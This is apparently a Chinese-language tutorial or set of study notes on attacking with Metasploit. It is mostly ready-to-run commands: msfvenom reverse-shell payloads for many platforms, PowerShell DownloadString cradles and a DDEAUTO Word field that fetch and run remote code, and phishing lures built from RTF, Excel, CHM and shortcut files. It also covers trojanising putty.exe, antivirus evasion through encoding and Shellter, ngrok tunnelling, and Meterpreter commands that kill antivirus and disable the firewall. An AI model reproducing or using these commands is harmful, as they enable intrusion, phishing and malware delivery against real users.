<h2 id="msfvenom"><a href="#msfvenom" class="headerlink" title="msfvenom"></a>msfvenom</h2><p><hanla></hanla>msfvenom<hanla></hanla>是<hanla></hanla>msfpayload<hanla></hanla>和<hanla></hanla>msfencode<hanla></hanla>的结合体，于<hanla></hanla>2015<hanla></hanla>年<hanla></hanla>6<hanla></hanla>月<hanla></hanla>8<hanla></hanla>日取代了<hanla></hanla>msfpayload<hanla></hanla>和<hanla></hanla>msfencode。<br><hanla></hanla>在此之后，metasploit-framework<hanla></hanla>下面的的<hanla></hanla>msfpayload（荷载生成器），msfencoder（编码器），<br>msfcli（监听接口）都不再被支持。<br><hanla></hanla>msfvenom<hanla></hanla>所有参数  </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/Ipa5RE"><img src="https://s3.jpg.cm/2021/10/05/Ipa5RE.png" alt="Ipa5RE.png"></a></p>
<p><hanla></hanla>用<hanla></hanla>encoder 对<hanla></hanla>payload 进行编码每次都不一样的，可以多编码几次，可能就能过掉杀软</p>
<h3 id="常用参数"><a href="#常用参数" class="headerlink" title="常用参数"></a>常用参数</h3><pre><code><hanla></hanla>比如想查看<hanla></hanla>windows/meterpreter/reverse_tcp<hanla></hanla>支持什么平台、哪些选项，可以使用
msfvenom -p windows/meterpreter/reverse_tcp --list-options

msfvenom --list payloads<hanla></hanla>可查看所有<hanla></hanla>payloads
msfvenom --list encoders<hanla></hanla>可查看所有编码器
评级最高的两个<hanla></hanla>encoder<hanla></hanla>为<hanla></hanla>cmd/powershell_base64<hanla></hanla>和<hanla></hanla>x86/shikata_ga_nai，其中<hanla></hanla>x86/shikata_ga_nai<hanla></hanla>也是免杀中使用频率最高的一个编码器

类似可用<hanla></hanla>msfvenom --list<hanla></hanla>命令查看的还有<hanla></hanla>payloads, encoders, nops, platforms, archs, encrypt, formats

msfvenom --list payloads 
查看所有<hanla></hanla>payloads
bind 直连  我去连接他
reverse 反弹连接 他来连接我
</code></pre>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpaW3T"><img src="https://s3.jpg.cm/2021/10/05/IpaW3T.png" alt="IpaW3T.png"></a></p>
<p>多态编码器：<br>每一次编码都不一样，可能多编几次就能过掉杀软了<br><hanla></hanla>excellent  杰出的  </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpalAW"><img src="https://s3.jpg.cm/2021/10/05/IpalAW.png" alt="IpalAW.png"></a></p>
<h3 id="监听参数"><a href="#监听参数" class="headerlink" title="监听参数"></a>监听参数</h3><p>防止假 session<br><hanla></hanla>在实战中，经常会遇到假<hanla></hanla>session<hanla></hanla>或者刚连接就断开的情况这里补充一些监听参数，防止假死与假<hanla></hanla>session。<br>msf exploit(multi/handler) &gt; set ExitOnSession false<br><hanla></hanla>//<hanla></hanla>可以在接收到<hanla></hanla>seesion<hanla></hanla>后继续监听端口，保持侦听。<br><hanla></hanla>防止<hanla></hanla>session<hanla></hanla>意外退出<br><hanla></hanla>msf5 exploit(multi/handler) &gt; set SessionCommunicationTimeout 0<br><hanla></hanla>//<hanla></hanla>默认情况下，如果一个会话将在<hanla></hanla>5<hanla></hanla>分钟（300<hanla></hanla>秒）没有任何活动，那么它会被杀死,<hanla></hanla>为防止此情况可将此项修改为<hanla></hanla>0<br>msf5 exploit(multi/handler) &gt; set SessionExpirationTimeout 0<br><hanla></hanla>/<hanla></hanla>默认情况下，一个星期（604800<hanla></hanla>秒）后，会话将被强制关闭,<hanla></hanla>修改为<hanla></hanla>0<hanla></hanla>可永久不会被关闭</p>
<h3 id="handler-后台持续监听"><a href="#handler-后台持续监听" class="headerlink" title="handler 后台持续监听"></a>handler 后台持续监听</h3><p><hanla></hanla>msf exploit(multi/handler) &gt; exploit -j -z<br><hanla></hanla>使用<hanla></hanla>exploit -j -z<hanla></hanla>可在后台持续监听,-j<hanla></hanla>为后台任务，-z<hanla></hanla>为持续监听，<br><hanla></hanla>使用<hanla></hanla>Jobs<hanla></hanla>命令查看和管理后台任务。jobs -K<hanla></hanla>可结束所有任务。  </p>
<p><hanla></hanla>还有种比较快捷的建立监听的方式，在<hanla></hanla>msf<hanla></hanla>下直接执行：  </p>
<p>msf5 &gt; handler -H 192.168.8.124 -P 1122 -p windows/meterpreter/reverse_tcp</p>
<h3 id="payload的可持续化"><a href="#payload的可持续化" class="headerlink" title="payload的可持续化"></a><hanla></hanla>payload<hanla></hanla>的可持续化</h3><p><hanla></hanla>一般来说使用<hanla></hanla>msfvenom<hanla></hanla>生成的<hanla></hanla>payload<hanla></hanla>会单独开启一个进程，这种进程很容易被发现和关闭，在后<br><hanla></hanla>期想做持久化的时候只能再使用<hanla></hanla>migrate<hanla></hanla>进行。<br><hanla></hanla>其实在生成<hanla></hanla>payload<hanla></hanla>时可直接使用如下命令，生成的<hanla></hanla>payload<hanla></hanla>会直接注入到指定进程中。<br>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1122 -e x86/shikata_ga_nai -b “\x00”<br>-i 5 -a x86 –platform win PrependMigrate=true PrependMigrateProc=svchost.exe -f exe -o  shell.exe<br><hanla></hanla>生成的<hanla></hanla>shell<hanla></hanla>程序执行后会启动两个进程<hanla></hanla>shell.exe<hanla></hanla>和<hanla></hanla>svchost.exe，关闭其中一个不会影响会话状态。<br><hanla></hanla>在上面的生成<hanla></hanla>payload<hanla></hanla>参数中：<br><hanla></hanla>（1）PrependMigrate=true PrependMigrateProc=svchost.exe 使这个程序默认会迁移到<hanla></hanla>svchost.exe<hanla></hanla>进程，自己测试的时候不建议到这个进程而是其他的持久进程。<br><hanla></hanla>（2）使用-p<hanla></hanla>指定使用的攻击载荷模块，使用-e<hanla></hanla>指定使用<hanla></hanla>x86/shikata_ga_nai<hanla></hanla>编码器，使用-f<hanla></hanla>选项告诉<hanla></hanla>MSF<hanla></hanla>编码器输出格式为<hanla></hanla>exe，-o<hanla></hanla>选项指定输出的文件名为<hanla></hanla>payload.exe，保存在根目录下</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/Ipa6m2"><img src="https://s3.jpg.cm/2021/10/05/Ipa6m2.png" alt="Ipa6m2.png"></a></p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpaVTH"><img src="https://s3.jpg.cm/2021/10/05/IpaVTH.png" alt="IpaVTH.png"></a></p>
<h3 id="各平台payload生成"><a href="#各平台payload生成" class="headerlink" title="各平台payload生成"></a><hanla></hanla>各平台<hanla></hanla>payload<hanla></hanla>生成</h3><pre><code><hanla></hanla>Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f elf &gt; shell.elf
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1122 -a x86 --platform Linux -f elf &gt; shell.elf
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f exe &gt; shell.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1122 -f exe &gt; shell.exe
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f macho &gt; shell.macho
Android
msfvenom -a dalvik -p android/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1122 -f raw &gt; shell.apk
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1122 R &gt; test.apk
</code></pre>
<h3 id="生成脚本payload"><a href="#生成脚本payload" class="headerlink" title="生成脚本payload"></a><hanla></hanla>生成脚本<hanla></hanla>payload</h3><pre><code><hanla></hanla>Powershell
msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=192.168.8.124 LPORT=1122 -e cmd/powershell_base64 -i 3 -f raw -o shell.ps1
Netcat
nc<hanla></hanla>正向连接
msfvenom -p windows/shell_hidden_bind_tcp LHOST=192.168.8.124 LPORT=1122  -f exe&gt; 1.exe
nc<hanla></hanla>反向连接，监听
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.8.124 LPORT=1122  -f exe&gt; 1.exe

PHP
msfvenom -p php/meterpreter/reverse_tcp LHOST=<your ip="" address=""> LPORT=<your port="" to="" connect="" on=""> -f raw &gt; shell.php 
cat shell.php | pbcopy &amp;&amp; echo '<!--?php ' | tr -d '\n' --> shell.php &amp;&amp; pbpaste &gt;&gt; shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your ip="" address=""> LPORT=<your port="" to="" connect="" on=""> -f asp &gt; shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<your ip="" address=""> LPORT=<your port="" to="" connect="" on=""> -f raw &gt; shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<your ip="" address=""> LPORT=<your port="" to="" connect="" on=""> -f war &gt; shell.war

php<hanla></hanla>建立的会话功能上会有缺失，提权用
use incognito
list_tokens -u 
不行
</your></your></your></your></your></your></your></your></code></pre>
<h3 id="监听Handlers"><a href="#监听Handlers" class="headerlink" title="监听Handlers"></a><hanla></hanla>监听<hanla></hanla>Handlers</h3><pre><code>use exploit/multi/handler
set PAYLOAD &lt;Payload name&gt;
set LHOST 192.168.8.124
et LPORT 1122
set ExitOnSession false
exploit -j -z
</code></pre>
<h3 id="Powershell配合msf无文件攻击"><a href="#Powershell配合msf无文件攻击" class="headerlink" title="Powershell配合msf无文件攻击"></a><hanla></hanla>Powershell<hanla></hanla>配合<hanla></hanla>msf<hanla></hanla>无文件攻击</h3><p><hanla></hanla>生成<hanla></hanla>ps<hanla></hanla>脚本<br><hanla></hanla>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1121 -f psh-reflection &gt;x.ps1</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpaAdL"><img src="https://s3.jpg.cm/2021/10/05/IpaAdL.png" alt="IpaAdL.png"></a></p>
<p>设置侦听<br><hanla></hanla>use exploit/multi/handler<br>set payload windows/x64/meterpreter/reverse_tcp<br>Set lhost 192.168.3.107<br>Run  </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpaXYf"><img src="https://s3.jpg.cm/2021/10/05/IpaXYf.png" alt="IpaXYf.png"></a></p>
<p>客户端运行<br><hanla></hanla>powershell IEX (New-Object Net.WebClient).DownloadString(‘<a target="_blank" rel="noopener" href="http://192.168.43.39/x.ps1'">http://192.168.43.39/x.ps1'</a>)</p>
<p><hanla></hanla>windows 7 测试了一下，powershell<hanla></hanla>停止运行，断开了<br><hanla></hanla>windows 10 还要设置免杀<br><hanla></hanla>cmd 要保持打开状态但是我们可以控制他在后台运行<br>无文件也可以注入到其他进程  </p>
<h3 id="Powershell配合word伪装木马执行"><a href="#Powershell配合word伪装木马执行" class="headerlink" title="Powershell配合word伪装木马执行"></a><hanla></hanla>Powershell<hanla></hanla>配合<hanla></hanla>word<hanla></hanla>伪装木马执行</h3><p>测试代码打开一个计算器</p>
<pre><code><hanla></hanla> {DDEAUTO&nbsp;C:\\windows\\system32\\cmd.exe&nbsp;"/k notepad.exe" }
新建<hanla></hanla>word<hanla></hanla>设置域，快捷键<hanla></hanla>ctrl+f9 插入域代码
DDEAUTO&nbsp;C:\\windows\\system32\\cmd.exe&nbsp;"/k&nbsp;powershell&nbsp;IEX&nbsp;(New-Object&nbsp;Net.WebClient).DownloadString('http://192.168.3.1/x.ps1')&nbsp;" 
</code></pre>
<p><hanla></hanla>找了一下<hanla></hanla>world<hanla></hanla>高版本好像没有这个代码插入</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpabRO"><img src="https://s3.jpg.cm/2021/10/05/IpabRO.png" alt="IpabRO.png"></a></p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpatAk"><img src="https://s3.jpg.cm/2021/10/05/IpatAk.png" alt="IpatAk.png"></a></p>
<h3 id="msf使用宏钓鱼"><a href="#msf使用宏钓鱼" class="headerlink" title="msf使用宏钓鱼"></a><hanla></hanla>msf<hanla></hanla>使用宏钓鱼</h3><pre><code><hanla></hanla>git clone https://github.com/bhdresh/CVE-2017-8759.git
python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.8.124/logo.txt


msfvenom -p windows/x64/meterpreter/reverse_tcp 
LHOST=192.168.8.124 LPORT=1133 -f exe &gt; /root/shell.exe

python cve-2017-8759_toolkit.py -M exp -e http://192.168.8.124/shell.exe -l shell.exe

开启监听模块，发送给目标运行钓鱼文件，等代上线

下载
</code></pre>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpaHOi"><img src="https://s3.jpg.cm/2021/10/05/IpaHOi.png" alt="IpaHOi.png"></a></p>
<p><hanla></hanla>第一步生成一个<hanla></hanla>rtf<hanla></hanla>文件</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/Ipa1f8"><img src="https://s3.jpg.cm/2021/10/05/Ipa1f8.png" alt="Ipa1f8.png"></a></p>
<p><hanla></hanla>生成<hanla></hanla>shell1.exe<hanla></hanla>文件</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/Ipau1w"><img src="https://s3.jpg.cm/2021/10/05/Ipau1w.png" alt="Ipau1w.png"></a></p>
<p>第三步捆绑<br><hanla></hanla>如果<hanla></hanla>80<hanla></hanla>端口被占用关闭一下<hanla></hanla>apache  </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpaNpe"><img src="https://s3.jpg.cm/2021/10/05/IpaNpe.png" alt="IpaNpe.png"></a></p>
<p>server runing on ：80 表示正常<br><hanla></hanla>运行<hanla></hanla>80<hanla></hanla>了<br>开一个监听  </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpaSTy"><img src="https://s3.jpg.cm/2021/10/05/IpaSTy.png" alt="IpaSTy.png"></a></p>
<p>把钓鱼文件复制出来放到桌面上：</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/Ipardr"><img src="https://s3.jpg.cm/2021/10/05/Ipardr.png" alt="Ipardr.png"></a></p>
<p><hanla></hanla>放到<hanla></hanla>windows 7 运行一下<br>额并没有成功，成功会有一个反弹链接</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/Ipasr5"><img src="https://s3.jpg.cm/2021/10/05/Ipasr5.png" alt="Ipasr5.png"></a></p>
<h3 id="msf制作excel钓鱼"><a href="#msf制作excel钓鱼" class="headerlink" title="msf制作excel钓鱼"></a><hanla></hanla>msf<hanla></hanla>制作<hanla></hanla>excel<hanla></hanla>钓鱼</h3><p><hanla></hanla>use exploit/multi/script/web_delivery<br>set target 2<br>set payload windows/meterpreter/reverse_tcp<br>set LHOST 192.168.3.143<br>set URIPATH /<br>exploit    </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpaECC"><img src="https://s3.jpg.cm/2021/10/05/IpaECC.png" alt="IpaECC.png"></a></p>
<p><hanla></hanla>使用<hanla></hanla>Out-Excel.ps1<hanla></hanla>制作<hanla></hanla>excel<hanla></hanla>钓鱼文件:<br>PS D:\temp&gt; . .\Out-Excel.ps1<br>PS D:\temp&gt; Out-Excel -PayloadURL <a target="_blank" rel="noopener" href="http://192.168.0.199:8080/">http://192.168.0.199:8080/</a> -OutputFile  D:\test.xls<br><hanla></hanla>制作<hanla></hanla>chm<hanla></hanla>钓鱼文件<br><hanla></hanla>Out-CHM -PayloadURL <a target="_blank" rel="noopener" href="http://192.168.3.143:8080/">http://192.168.3.143:8080/</a> -HHCPath “C:\Program Files<br>(x86)\HTML Help Workshop”<br><hanla></hanla>制作快捷方式钓鱼文件<br><hanla></hanla>PS D:\temp&gt; . .\Out-Shortcut.ps1<br>PS D:\temp&gt; Out-Shortcut -PayloadURL <a target="_blank" rel="noopener" href="http://192.168.3.143:8080/">http://192.168.3.143:8080/</a> -HotKey<br>‘F3’ -Icon ‘notepad.exe’  </p>
<p><hanla></hanla>nishang<hanla></hanla>插件</p>
<h3 id="使用ngrok穿透内网"><a href="#使用ngrok穿透内网" class="headerlink" title="使用ngrok穿透内网"></a><hanla></hanla>使用<hanla></hanla>ngrok<hanla></hanla>穿透内网</h3><p><hanla></hanla>设置<hanla></hanla>ngrok<hanla></hanla>隧道  </p>
<p>本机安装客户端<br><hanla></hanla>./sunny clientid  id<hanla></hanla>号  </p>
<p><hanla></hanla>ngrok<hanla></hanla>注册开通一个隧道  </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpaTa2"><img src="https://s3.jpg.cm/2021/10/05/IpaTa2.png" alt="IpaTa2.png"></a></p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpiLG8"><img src="https://s3.jpg.cm/2021/10/05/IpiLG8.png" alt="IpiLG8.png"></a></p>
<p>确认添加<br><hanla></hanla>复制一下隧道<hanla></hanla>id  </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/Ipa9vW"><img src="https://s3.jpg.cm/2021/10/05/Ipa9vW.png" alt="Ipa9vW.png"></a></p>
<p>下载客户端，放到虚拟机解压：<br><hanla></hanla>./sunny clientid (刚刚复制的<hanla></hanla>id)<br><hanla></hanla>啊这链接不了  </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpayXS"><img src="https://s3.jpg.cm/2021/10/05/IpayXS.png" alt="IpayXS.png"></a></p>
<p><hanla></hanla>q<hanla></hanla>其实是自己没网了</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpahZh"><img src="https://s3.jpg.cm/2021/10/05/IpahZh.png" alt="IpahZh.png"></a></p>
<p><hanla></hanla>有网进去是这样的，但是<hanla></hanla>tunnel status 没有现实<hanla></hanla>online<br><hanla></hanla>又去开一个还是不行：<br>在试一个多等一会就可以了 隧道代理时这个窗口要开着  </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpaieH"><img src="https://s3.jpg.cm/2021/10/05/IpaieH.png" alt="IpaieH.png"></a></p>
<p><hanla></hanla>ping<hanla></hanla>一下隧道的域名，获得<hanla></hanla>ip</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpaxsL"><img src="https://s3.jpg.cm/2021/10/05/IpaxsL.png" alt="IpaxsL.png"></a></p>
<p>生成我们的木马：</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpaDKf"><img src="https://s3.jpg.cm/2021/10/05/IpaDKf.png" alt="IpaDKf.png"></a></p>
<p>所有我们监听谁</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpaOWU"><img src="https://s3.jpg.cm/2021/10/05/IpaOWU.png" alt="IpaOWU.png"></a></p>
<p>use exploit/multi/handler<br>set payload windows/meterpreter/reverse_tcp<br>show options<br>set lhost 127.0.0.1<br>set lport  10791<br><hanla></hanla>这里我又断开了太不稳定了  </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpaZHO"><img src="https://s3.jpg.cm/2021/10/05/IpaZHO.png" alt="IpaZHO.png"></a></p>
<h3 id="Msf5-Evasion模块免杀"><a href="#Msf5-Evasion模块免杀" class="headerlink" title="Msf5-Evasion模块免杀"></a><hanla></hanla>Msf5-Evasion<hanla></hanla>模块免杀</h3><p><hanla></hanla>2019<hanla></hanla>年<hanla></hanla>1<hanla></hanla>月，metasploit<hanla></hanla>升级到了<hanla></hanla>5.0，引入了一个新的模块叫<hanla></hanla>Evasion<hanla></hanla>模块，官方宣称这个模块可以创建反杀毒软件的木马。<br><hanla></hanla>evasion<hanla></hanla>有以下几个模块,<hanla></hanla>可以使用<hanla></hanla>show evasion<hanla></hanla>进行查看。<br>但是基本发布出来就挂掉了  </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/Ipa4p4"><img src="https://s3.jpg.cm/2021/10/05/Ipa4p4.png" alt="Ipa4p4.png"></a></p>
<p><hanla></hanla>一个过<hanla></hanla>windows defender 防火墙的</p>
<pre><code><hanla></hanla>使用<hanla></hanla>use windows/windows_defender_exe<hanla></hanla>进行生成<hanla></hanla>payload  
msf5 &gt; use windows/windows_defender_exe
msf5 evasion(windows/windows_defender_exe) &gt; set filename payload.exe
msf5 evasion(windows/windows_defender_exe) &gt; set payload windows/meterpreter/reverse_tcp
msf5 evasion(windows/windows_defender_exe) &gt; set LHOST 192.168.8.124
msf5 evasion(windows/windows_defender_exe) &gt; set LPORT 1122
msf5 evasion(windows/windows_defender_exe) &gt; run
</code></pre>
<p>设置监听：<br>handler -H 10.211.55.2 -P 3333 -p windows/meterpreter/reverse_tcp<br><hanla></hanla>火绒也过不了<br>过不了<br><hanla></hanla>可以去<hanla></hanla>youtube 找找最新的<br><hanla></hanla>bypass av msf 指定一下时间  </p>
<h3 id="捆绑免杀"><a href="#捆绑免杀" class="headerlink" title="捆绑免杀"></a>捆绑免杀</h3><pre><code><hanla></hanla>生成<hanla></hanla>payload 捆绑<hanla></hanla>putty.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1122  -x putty.exe  -f exe -o payload3.exe


捆绑编码免杀
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1122 -e x86/shikata_ga_nai -x putty.exe  -i 15 -f exe -o payload4.exe

多重编码免杀
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/call4_dword_xor -i 14 LHOST=192.168.232.128 LPORT=1122 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 13 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -b "&amp;" -i 4 -f raw | msfvenom -a x86 --platform windows -e cmd/powershell_base64 -i 10 -x putty.exe -k -f exe &gt; shell.exe

http://virustotal.com/   验证静态免杀 bypass
</code></pre>
<h3 id="shellter免杀"><a href="#shellter免杀" class="headerlink" title="shellter免杀"></a><hanla></hanla>shellter<hanla></hanla>免杀</h3><p><hanla></hanla>shellcode<hanla></hanla>代码注入工具</p>
<p><a target="_blank" rel="noopener" href="https://www.shellterproject.com/download/">https://www.shellterproject.com/download/</a></p>
<p>安装<br><hanla></hanla>apt-get install shellter</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpagdD"><img src="https://s3.jpg.cm/2021/10/05/IpagdD.png" alt="IpagdD.png"></a></p>
<p><hanla></hanla>shellter<hanla></hanla>执行，需要一个红酒瓶的环境会报错<br>报错没关系<br>根据报错提示进行安装</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpaBaX"><img src="https://s3.jpg.cm/2021/10/05/IpaBaX.png" alt="IpaBaX.png"></a></p>
<p><hanla></hanla>shellter<hanla></hanla>打开<br><hanla></hanla>哇真的坑啊，网上找了半天要<hanla></hanla>wine /usr/share/windows-resources/shellter/shellter.exe 才能打开  </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpaoXG"><img src="https://s3.jpg.cm/2021/10/05/IpaoXG.png" alt="IpaoXG.png"></a></p>
<pre><code><hanla></hanla>Choose Operation Mode - Auto/Manual (A/M/H)：A&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;//<hanla></hanla>选择模式 A 自动模式自动注入后门，M<hanla></hanla>高级模式，H<hanla></hanla>帮助
PE Target：/home/notepad.exe&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; // 注入的程序 这里已<hanla></hanla>windows<hanla></hanla>系统自带的<hanla></hanla>32<hanla></hanla>位记事本程序举举例
或者用工具包下面有个<hanla></hanla>putty
</code></pre>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpavZu"><img src="https://s3.jpg.cm/2021/10/05/IpavZu.png" alt="IpavZu.png"></a></p>
<p><hanla></hanla>对<hanla></hanla>putty<hanla></hanla>进行注入</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/Ipazrp"><img src="https://s3.jpg.cm/2021/10/05/Ipazrp.png" alt="Ipazrp.png"></a></p>
<pre><code><hanla></hanla>Enable Stealth Mode? (Y/N/H): Y&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;//<hanla></hanla>是否启用隐身模式 输入<hanla></hanla>Y<hanla></hanla>启用
Use a listed payload or custom? (L/C/H): L&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;//<hanla></hanla>使用攻击模块列表或者自定义？ 输入<hanla></hanla>L 选择<hanla></hanla>Payload
Select payload by index: 1&nbsp; &nbsp; &nbsp; //<hanla></hanla>选择第一个
</code></pre>
<p><hanla></hanla>此时<hanla></hanla>putty 已经被注入进去了</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/Ipa0K6"><img src="https://s3.jpg.cm/2021/10/05/Ipa0K6.png" alt="Ipa0K6.png"></a></p>
<p>开一个监听<br><hanla></hanla>把<hanla></hanla>shellter 注入的程序放到<hanla></hanla>windows 7  360<hanla></hanla>环境下运行<br><hanla></hanla>被<hanla></hanla>360<hanla></hanla>发现了而且还运行不了  </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpaCHE"><img src="https://s3.jpg.cm/2021/10/05/IpaCHE.png" alt="IpaCHE.png"></a></p>
<h3 id="免杀msfpayload-重点！！！"><a href="#免杀msfpayload-重点！！！" class="headerlink" title="免杀msfpayload  重点！！！"></a><hanla></hanla>免杀<hanla></hanla>msfpayload  重点！！！</h3><pre><code><hanla></hanla>生产<hanla></hanla>py<hanla></hanla>文件的<hanla></hanla>payload
msfVENOM -p windows/x64/meterpreter/reverse_tcp LPORT=1155 LHOST=192.168.232.128  -e x86/shikata_ga_nai -i 17 -f py -o  /home/121.py
先生成一个<hanla></hanla>payload
</code></pre>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/Ipa3qT"><img src="https://s3.jpg.cm/2021/10/05/Ipa3qT.png" alt="Ipa3qT.png"></a></p>
<p>借助  msf-py-bypass.txt<br><hanla></hanla>往头部和尾部都加点东西</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpaKgQ"><img src="https://s3.jpg.cm/2021/10/05/IpaKgQ.png" alt="IpaKgQ.png"></a></p>
<p>保存<br><hanla></hanla>第一个目录解压到<hanla></hanla>python27<hanla></hanla>目录下<br><hanla></hanla>第二个里面有两个<hanla></hanla>exe<hanla></hanla>程序安装一下 </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/Ipiqie"><img src="https://s3.jpg.cm/2021/10/05/Ipiqie.png" alt="Ipiqie.png"></a></p>
<p><hanla></hanla>把刚刚生成的<hanla></hanla>121.py<hanla></hanla>文件复制到<hanla></hanla>python27 目录下</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/Ipi5sr"><img src="https://s3.jpg.cm/2021/10/05/Ipi5sr.png" alt="Ipi5sr.png"></a></p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/Ipi7h5"><img src="https://s3.jpg.cm/2021/10/05/Ipi7h5.png" alt="Ipi7h5.png"></a></p>
<p>他就给你生成了一个  121.exe</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/Ipiney"><img src="https://s3.jpg.cm/2021/10/05/Ipiney.png" alt="Ipiney.png"></a></p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpiRvk"><img src="https://s3.jpg.cm/2021/10/05/IpiRvk.png" alt="IpiRvk.png"></a></p>
<p>建立侦听</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpidWC"><img src="https://s3.jpg.cm/2021/10/05/IpidWC.png" alt="IpidWC.png"></a></p>
<p>运行一下木马<br><hanla></hanla>360 给你杀掉了太强了<br><hanla></hanla>session 5  </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/IpieJt"><img src="https://s3.jpg.cm/2021/10/05/IpieJt.png" alt="IpieJt.png"></a></p>
<h2 id="什么是Meterpreter"><a href="#什么是Meterpreter" class="headerlink" title="什么是Meterpreter"></a><hanla></hanla>什么是<hanla></hanla>Meterpreter</h2><pre><code><hanla></hanla>Meterpreter<hanla></hanla>是<hanla></hanla>Metasploit<hanla></hanla>框架中的一个扩展模块，作为溢出成功以后的攻击载荷使用，攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个<hanla></hanla>Meterpreter shell<hanla></hanla>的链接。Meterpreter shell<hanla></hanla>作为渗透模块有很多有用的功能，比如添加一个用户、隐藏一些东西、打开<hanla></hanla>shell、得到用户密码、上传下载远程主机的文件、运行<hanla></hanla>cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和<hanla></hanla>IP<hanla></hanla>地址等信息。另外<hanla></hanla>Meterpreter<hanla></hanla>能够躲避入侵检测系统。在远程主机上隐藏自己,<hanla></hanla>它不改变系统硬盘中的文件,<hanla></hanla>因此<hanla></hanla>HIDS[基于主机的入侵检测系统]<hanla></hanla>很难对它做出响应。此外它在运行的时候系统时间是变化的,<hanla></hanla>所以跟踪它或者终止它对于一个有经验的人也会变得非常困难。

https://www.cnblogs.com/backlion/p/9484949.html

1.<hanla></hanla>看权限
2.<hanla></hanla>看<hanla></hanla>payload 所用脚本协议
php/meterpreter/reverse_tcp
window/meterpreter/reverse_tcp aa.exe
</code></pre>
<h3 id="基本命令"><a href="#基本命令" class="headerlink" title="基本命令"></a>基本命令</h3><pre><code><hanla></hanla>background  挂起
sessions -l    会话
sessions -i 1 使用会话
sessions -k 1    删除会话
进程迁移
run post/windows/manage/migrate
关闭杀软
run killav
通过其 shell 来关闭防火墙
netsh adcfirewall set allprofiles state off
查看目标机所有流量
run packetrecorder -i 1
提取系统信息
run scraper
ps 查看进程
migrate 1774 切换进程
截屏  screenshot
获取系统运行的平台 sysinfo
</code></pre>
